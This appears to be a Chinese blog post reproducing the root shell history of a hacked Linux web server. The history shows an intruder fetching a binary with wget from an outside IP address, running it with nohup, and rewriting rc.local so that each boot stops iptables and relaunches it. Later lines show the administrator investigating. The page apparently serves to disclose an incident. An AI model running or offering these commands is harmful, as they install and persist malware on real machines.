  979  2014-01-20 22:28:20 root killall java-2013
  980  2014-01-20 22:28:20 root killall wins
  981  2014-01-20 22:28:20 root rm -f -r /etc/wins
  982  2014-01-20 22:28:20 root rm -f -r /etc/java-2013
  983  2014-01-20 22:28:20 root rm -f -r /etc/java-2013/java-2013
  984  2014-01-20 22:28:20 root mkdir /etc/wins
  985  2014-01-20 22:28:20 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  986  2014-01-20 22:28:21 root chmod 0755 /etc/wins/wins
  987  2014-01-20 22:28:21 root nohup /etc/wins/wins > /dev/null 2>&1 &
  988  2014-01-20 22:28:21 root rm -f -r /etc/rc.local
  989  2014-01-20 22:28:21 root rm -r -f /etc/rc.d/rc.local
  990  2014-01-20 22:28:21 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  991  2014-01-20 22:28:21 root echo "cd /etc/wins">>/etc/rc.local
  992  2014-01-20 22:28:21 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  993  2014-01-20 22:28:21 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  994  2014-01-20 22:28:21 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  995  2014-01-20 22:28:21 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  996  2014-01-20 22:28:21 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  997  2014-01-20 22:28:21 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  998  2014-01-20 22:28:21 root rm -f -r 2618
  999  2014-01-20 22:28:21 root rm -r -f TS269
1000  2014-01-20 22:28:21 root exit
1001  2014-01-20 22:31:17 root vi killback.sh
1002  2014-01-20 22:32:37 root cd /tmp/
1003  2014-01-20 22:32:37 root ls
1004  2014-01-20 22:32:39 root ll
1005  2014-01-20 22:32:46 root rm java.pl
1006  2014-01-20 22:32:51 root vi java.pl
1007  2014-01-20 22:33:26 root history
1008  2014-01-20 22:33:55 root cat /etc/rc.local
1009  2014-01-20 22:38:33 root history|grep wget
1010  2014-01-20 23:11:31 root history|more
1011  2014-01-20 23:14:47 root history > /tmp/tttt
[root@web tmp]#

你可能感兴趣的:(linux被黑)